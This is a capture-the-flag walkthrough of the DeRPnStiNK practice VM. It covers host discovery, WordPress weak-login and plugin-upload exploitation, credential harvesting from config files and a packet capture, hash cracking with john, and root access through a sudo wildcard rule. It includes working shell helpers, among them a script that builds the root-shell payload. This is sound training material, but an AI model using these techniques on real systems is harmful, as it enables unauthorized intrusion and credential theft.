Case analysis of penetration of DeRPnStiNK target aircraft

2025-01-22 Update From: SLTechnology News&Howtos > Network Security


Shulou(Shulou.com)05/31 Report--

This article walks through a penetration of the DeRPnStiNK target machine, a downloadable boot-to-root practice VM, from host discovery to a root shell. It is aimed at beginners; each step explains why it is taken, not only what was typed.

DeRPnStiNK target machine penetration

We use the DeRPnStiNK target machine, downloaded from the Internet, as a practice environment for beginners.

After downloading the target machine, open it directly in the virtual machine software; its network adapter is left in the default bridged mode. Note that the Kali attack machine must also be in bridged mode, otherwise it cannot reach the target. Since the target's address is not known in advance, we first have to discover hosts on the segment. Check our own IP address first: 192.168.50.76, as shown in the figure:

Use nmap or netdiscover for host discovery:

nmap -sP 192.168.50.0/24

(-sP does host discovery only and skips port scanning and other probes; in current nmap it is an alias of -sn), or

netdiscover -r 192.168.50.0/24

The IP address of the target is found as shown in the figure:

Once the target's IP is known, scan it with nmap -A (version detection, OS detection, default scripts and traceroute). Ports 21 (FTP), 22 (SSH) and 80 (HTTP) are open, among others, as shown in the figure:
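To keep the scan result usable later in the engagement, save it in greppable format (nmap -A -oG scan.gnmap <target-ip>) and extract the open ports from the file instead of re-reading the screen. The functions below are an added example, not part of the original writeup; SAMPLE_GNMAP is a constructed -oG line mirroring the ports found here, and the target IP in it is a placeholder (the writeup does not print the target's address).

```shell
#!/bin/sh
# Added example: parse nmap greppable output (-oG) into "port/service" pairs.
# Typical producers (not run here):
#   nmap -sn 192.168.50.0/24              # host discovery only (-sP is the old alias)
#   nmap -A -oG scan.gnmap <target-ip>    # full scan with a greppable copy on disk

# Constructed sample of one -oG "Host:" line; sections are tab-separated.
# The target IP is a placeholder, not the address from the writeup.
SAMPLE_GNMAP=$(printf 'Host: 192.168.50.100 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (997)')

# open_ports <gnmap-text>: print "port/service" for every open port, space-separated.
# Each entry is laid out as port/state/protocol/owner/service/rpcinfo/version/
open_ports() {
  printf '%s\n' "$1" \
    | tr '\t' '\n' \
    | grep '^Ports:' \
    | sed 's/^Ports: //' \
    | tr ',' '\n' \
    | sed 's/^ *//' \
    | awk -F/ '$2 == "open" { print $1 "/" $5 }' \
    | paste -sd ' ' -
}

# open_port_numbers <gnmap-text>: only the port numbers, e.g. to feed a follow-up scan:
#   nmap -p "$(open_port_numbers "$(cat scan.gnmap)" | tr ' ' ',')" -sV <target-ip>
open_port_numbers() {
  open_ports "$1" | tr ' ' '\n' | cut -d/ -f1 | paste -sd ' ' -
}

open_ports "$SAMPLE_GNMAP"
```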

Open the HTTP service in a browser to see what it serves. This is the page we see:

When a page gives us nothing obvious, the first thing to check is its source. (If the page is an image or other content where right-click does not offer the "view source" item, prefix the URL with view-source: instead.) Viewing the source reveals a flag, as shown in the figure:

We then look for more useful information under other paths, as shown in the figure:

The file webnotes/info.txt contains the sentence: "stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live." In other words, the blog is served under a hostname that public DNS does not know; we need a local hosts-file entry before we can reach it.

After browsing the directories and links on offer without finding anything more sensitive, we brute-force directories with dirb (or the Yujian (御剑) directory scanner). The scan reveals the path weblog. Requesting it redirects to a domain name, as shown below. Following the hint in info.txt, we add a resolution for that name to the hosts file; on Kali it is /etc/hosts.

Add the hosts entry as shown in the figure:

With the entry in place, the weblog directory loads normally.
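The hosts-file step is usually a one-liner (echo '<target-ip> derpnstink.local' | sudo tee -a /etc/hosts), but it is worth doing it in a way that does not leave two conflicting lines behind when the target's DHCP address changes between sessions, since the resolver takes the first match. The functions below are an added example, not part of the original writeup; they operate on any file path so they can be exercised on a temp copy, and the IP used is a placeholder because the writeup does not list the target's address.

```shell
#!/bin/sh
# Added example: maintain a hosts-file entry for the target's virtual host.
# Real-world one-liner (not run here):
#   echo '<target-ip> derpnstink.local' | sudo tee -a /etc/hosts

# add_host_entry <file> <ip> <name>: drop any existing active line for <name>, then append.
add_host_entry() {
  file=$1; ip=$2; name=$3
  esc=$(printf '%s' "$name" | sed 's/\./\\./g')            # escape dots for the regex
  tmp=$(mktemp)
  # keep every line that is not an (uncommented) mapping for this name
  grep -vE "^[^#]*[[:space:]]$esc([[:space:]]|\$)" "$file" > "$tmp" || true
  printf '%s\t%s\n' "$ip" "$name" >> "$tmp"
  cat "$tmp" > "$file" && rm -f "$tmp"
}

# resolve_name <file> <name>: print the IP the file maps <name> to, first match wins
# (the same rule the system resolver applies).
resolve_name() {
  awk -v n="$2" '$0 !~ /^[[:space:]]*#/ { for (i = 2; i <= NF; i++) if ($i == n) { print $1; exit } }' "$1"
}

# Demo on a temp copy (placeholder IP).
HOSTS_COPY=$(mktemp)
printf '127.0.0.1\tlocalhost\n' > "$HOSTS_COPY"
add_host_entry "$HOSTS_COPY" 192.168.50.100 derpnstink.local
resolve_name "$HOSTS_COPY" derpnstink.local
```

Re-running add_host_entry with a new IP replaces the old mapping rather than appending a second one, so the name always resolves to the current target.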

What next? Looking at the site, it is clearly a WordPress blog, so we try the default administrative login path, wp-login.php. With a login page in hand, the usual first check is weak credentials: admin/admin logs us straight into the dashboard.

WordPress-specific scanners can then look for vulnerable components. On Kali use wpscan (note that the URL must include the blog's path, as shown in the figure):

wpscan --url http://derpnstink.local/weblog/

The highlighted plugin version (the Slideshow Gallery plugin) has a known file-upload vulnerability, and Metasploit carries a matching module, wp_slideshowgallery_upload (exploit/unix/webapp/wp_slideshowgallery_upload). Start msfconsole, locate it with search wp_slideshowgallery_upload, then load it with use, as shown in the figure:

Run options to list the configuration items and set them for your target (the target host, the blog path /weblog/, and the admin/admin WordPress credentials, since the upload is an authenticated one), as shown in the figure:

Running the exploit gives us a shell, as shown below, from which we can read the sensitive files on the web server.

A habit worth keeping on every engagement: whenever you come across a config file, check it for credentials. Here weblog/wp-config.php gives us the database username and password, as shown in the figure:
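From a limited web shell it is often easier to extract the credentials with a one-liner than to page through the file. The helper below is an added example, not part of the original writeup; WP_CONFIG_SAMPLE is a constructed fragment in the shape of a wp-config.php, with the root/admin values the writeup reports filled in, not the target's real file.

```shell
#!/bin/sh
# Added example: pull database credentials out of wp-config.php contents.
# Constructed sample (mirrors the root/admin values found in the writeup).
WP_CONFIG_SAMPLE="<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
define( 'DB_USER', \"root\" );
define('DB_PASSWORD', 'admin');
define('DB_HOST', 'localhost');
"

# wp_config_get <file-contents> <CONSTANT>: print the first value defined for CONSTANT.
# Tolerates both quote styles and optional whitespace inside define( ... ).
wp_config_get() {
  printf '%s\n' "$1" \
    | sed -n "s/^[[:space:]]*define[[:space:]]*([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" \
    | head -n 1
}

# db_credentials <file-contents>: "user:password@host/dbname", the four values needed for
#   mysql -u <user> -p<password> -h <host> <dbname>
db_credentials() {
  printf '%s:%s@%s/%s\n' \
    "$(wp_config_get "$1" DB_USER)" "$(wp_config_get "$1" DB_PASSWORD)" \
    "$(wp_config_get "$1" DB_HOST)" "$(wp_config_get "$1" DB_NAME)"
}

db_credentials "$WP_CONFIG_SAMPLE"
```

On a real shell, pass the file in with wp_config_get "$(cat weblog/wp-config.php)" DB_PASSWORD; the same pattern works for the AUTH_KEY and other salts if they are ever needed.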

The earlier dirb/Yujian scan also turned up the path php/phpmyadmin, the phpMyAdmin web console for the database. Log in there with the credentials just recovered, root/admin.

In the database we find flag2, and the wp_users table holds the WordPress users' password hashes.

Kali bundles many tools for the next step. Given a hash string, first classify it with hash-identifier. Note that this tool does not crack anything; it only guesses the hash type from the string's shape, as shown in the figure:

Then crack it with john. The rockyou.txt wordlist used here ships with Kali under /usr/share/wordlists (gzipped; unpack it once with gunzip). The cracked password is wedgie57, and it also works for logging in to FTP.
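What hash-identifier does is essentially prefix and length matching, and knowing the rules lets you go straight to the right john --format instead of letting john guess. The functions below are an added example, not part of the original writeup or of hash-identifier; SAMPLE_WP_HASH is a constructed string in the shape of a wp_users.user_pass value, not a real hash from the target.

```shell
#!/bin/sh
# Added example: classify a password hash by its shape and map it to john's --format.

# hash_format <hash>: print a human-readable family name.
hash_format() {
  case "$1" in
    '$P$'*|'$H$'*)            echo phpass ;;        # WordPress / phpBB portable hash
    '$1$'*)                   echo md5crypt ;;
    '$2a$'*|'$2b$'*|'$2y$'*)  echo bcrypt ;;
    '$5$'*)                   echo sha256crypt ;;
    '$6$'*)                   echo sha512crypt ;;
    *[!0-9a-fA-F]*)           echo unknown ;;       # not a bare hex digest either
    *)
      case "$(printf '%s' "$1" | wc -c | tr -d ' ')" in   # bare hex digest: guess by length
        32) echo md5 ;;      # an NTLM hash has the same shape; try both formats
        40) echo sha1 ;;
        64) echo sha256 ;;
        *)  echo unknown ;;
      esac ;;
  esac
}

# john_format <hash>: the --format value john expects for that family; fails if unknown.
john_format() {
  case "$(hash_format "$1")" in
    phpass)      echo phpass ;;
    md5crypt)    echo md5crypt ;;
    bcrypt)      echo bcrypt ;;
    sha256crypt) echo sha256crypt ;;
    sha512crypt) echo sha512crypt ;;
    md5)         echo raw-md5 ;;
    sha1)        echo raw-sha1 ;;
    sha256)      echo raw-sha256 ;;
    *)           return 1 ;;
  esac
}

# Constructed sample in the shape of a wp_users.user_pass value:
# "$P$" prefix, 1-char cost, 8-char salt, 22-char hash.
SAMPLE_WP_HASH='$P$B0123456789abcdefghijklmnopqrst'

# The crack command built from the classification (rockyou ships gzipped on Kali:
#   gunzip /usr/share/wordlists/rockyou.txt.gz   once).
echo "john --format=$(john_format "$SAMPLE_WP_HASH") --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt"
```

Note that a 32-character hex string is ambiguous (MD5, NTLM and others share the shape), which is exactly why hash-identifier lists several candidates; the length rule only narrows the field.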

Any client with FTP support (I use MobaXterm, Xshell and the like) can connect to the target. Two files are of interest: a saved conversation, and an SSH key (in the ssh folder, a file named key, evidently an SSH private key).

We save the key locally and log in with ssh -i key (the key file must be readable only by its owner, e.g. chmod 600 key, or ssh refuses to use it), as shown in the figure:

Once on the system over SSH, a look around the home directory reveals flag.txt, as shown in the figure:

Another sensitive file is the packet capture derpissues.pcap. We analyze it in Wireshark to see what it contains.

The file is pulled back to Kali with scp over the same SSH key; the general form of the command is:

scp -i key <user>@<target-ip>:<path-to>/derpissues.pcap .

Open derpissues.pcap in Wireshark. There are many packets, so filter on the http protocol. (Why HTTP first? The conversation recovered over FTP mentions adding a new user, which requires logging in at weblog/wp-admin, so the login form submission, an HTTP POST, should be in the capture.) Looking through the GET and POST requests for submitted form data, we find the login fields in clear text, including Form item: "pwd" = "derpderpderpderpderpderpderp".
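The same extraction can be scripted once the POST bodies are dumped out of the capture with tshark, which is handy when a capture holds dozens of logins. The code below is an added example, not part of the original writeup; SAMPLE_POST_BODY is a constructed wp-login.php submission that uses the pwd value the writeup reports, while the username reuses the account the writeup logs into next and the remaining fields are placeholders.

```shell
#!/bin/sh
# Added example: recover form fields from a captured HTTP POST body.
# Dumping the bodies from the capture is left to tshark (not run here):
#   tshark -r derpissues.pcap -Y 'http.request.method == "POST"' -T fields -e http.file_data

# Constructed sample of a wp-login.php POST body (placeholders except pwd).
SAMPLE_POST_BODY='log=mrderp&pwd=derpderpderpderpderpderpderp&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1'

# urldecode <string>: '+' -> space, %XX -> byte. Done in awk so it works in plain sh.
urldecode() {
  printf '%s\n' "$1" | awk '
    function hexval(h,   v, i) {
      v = 0
      for (i = 1; i <= length(h); i++)
        v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
      return v
    }
    {
      s = $0; out = ""
      gsub(/\+/, " ", s)
      while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
        out = out substr(s, 1, RSTART - 1) sprintf("%c", hexval(substr(s, RSTART + 1, 2)))
        s = substr(s, RSTART + 3)
      }
      print out s
    }'
}

# form_field <body> <name>: decoded value of the first field called <name>; empty if absent.
form_field() {
  raw=$(printf '%s\n' "$1" | tr '&' '\n' | grep "^$2=" | head -n 1 | cut -d= -f2-)
  urldecode "$raw"
}

# The two fields a WordPress login needs, read from the constructed capture.
printf 'user=%s pass=%s\n' "$(form_field "$SAMPLE_POST_BODY" log)" "$(form_field "$SAMPLE_POST_BODY" pwd)"
```

Because the body is form-encoded, a password containing '+' or '%' would be mangled by a plain grep; decoding before use avoids chasing a wrong credential.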

With that password we open a new SSH session as the user mrderp, as shown in the figure:

In helpdesk.log we find a line showing that the issue was handled by a user with sudo rights, so we check what sudo allows us to do.

sudo -l lists the commands this account may run through sudo, as shown in the figure:

That is, mrderp may use sudo only to run files matching derpy* in the binaries directory under his home. The directory does not exist yet, so we create the binaries folder and a derpy.sh script inside it (for example one that simply launches /bin/bash), make it executable with chmod +x, and run it with sudo. The resulting shell is root: privilege escalation succeeded.
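The weakness is the wildcard: sudoers compares the command path against the pattern, so any file whose name starts with derpy in that directory qualifies, and because the directory is writable by mrderp he controls what that file does. The script below is an added example, not part of the original writeup; SAMPLE_SUDO_L is constructed sudo -l output carrying the rule described above (hostname and Defaults line are placeholders), and the payload is created under a temp directory so it can be run without touching a real system.

```shell
#!/bin/sh
# Added example: find wildcard command rules in "sudo -l" output and drop a
# payload whose path satisfies the rule.

# Constructed "sudo -l" output (hostname and Defaults line are placeholders).
SAMPLE_SUDO_L='Matching Defaults entries for mrderp on derpnstink:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mrderp may run the following commands on derpnstink:
    (ALL) /home/mrderp/binaries/derpy*'

# sudo_wildcard_rules <sudo -l text>: absolute command paths that contain a glob wildcard.
sudo_wildcard_rules() {
  printf '%s\n' "$1" | awk '{ for (i = 1; i <= NF; i++) { p = $i; sub(/,$/, "", p); if (p ~ /^\/.*[*?]/) print p } }'
}

# matches_rule <path> <rule>: shell pattern match approximating the fnmatch test sudoers
# applies to a command path (sudoers wildcards do not cross a "/"; keep the payload in the
# rule's own directory and the two agree).
matches_rule() {
  case "$1" in
    $2) return 0 ;;
    *)  return 1 ;;
  esac
}

# build_payload <rule> <root-dir>: create <root-dir>/<rule-dir>/<stem>.sh that execs a
# shell; with an empty <root-dir> it writes the real path. Prints the file created.
build_payload() {
  rule=$1; root=$2
  stem=$(basename "$rule" | sed 's/[*?].*$//')          # "derpy*" -> "derpy"
  target="$root$(dirname "$rule")/$stem.sh"
  mkdir -p "$(dirname "$target")"
  printf '#!/bin/sh\nexec /bin/bash\n' > "$target"
  chmod 755 "$target"
  printf '%s\n' "$target"
}

# Demo under a temp directory. On the target it would be:
#   build_payload '/home/mrderp/binaries/derpy*' ''  &&  sudo /home/mrderp/binaries/derpy.sh
RULE=$(sudo_wildcard_rules "$SAMPLE_SUDO_L")
build_payload "$RULE" "$(mktemp -d)"
```

The defensive reading is the same check in reverse: a sudoers rule whose path contains a wildcard, or points into a directory the user can write, is equivalent to unrestricted root.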

Finally, look in root's home directory to collect the last flag.
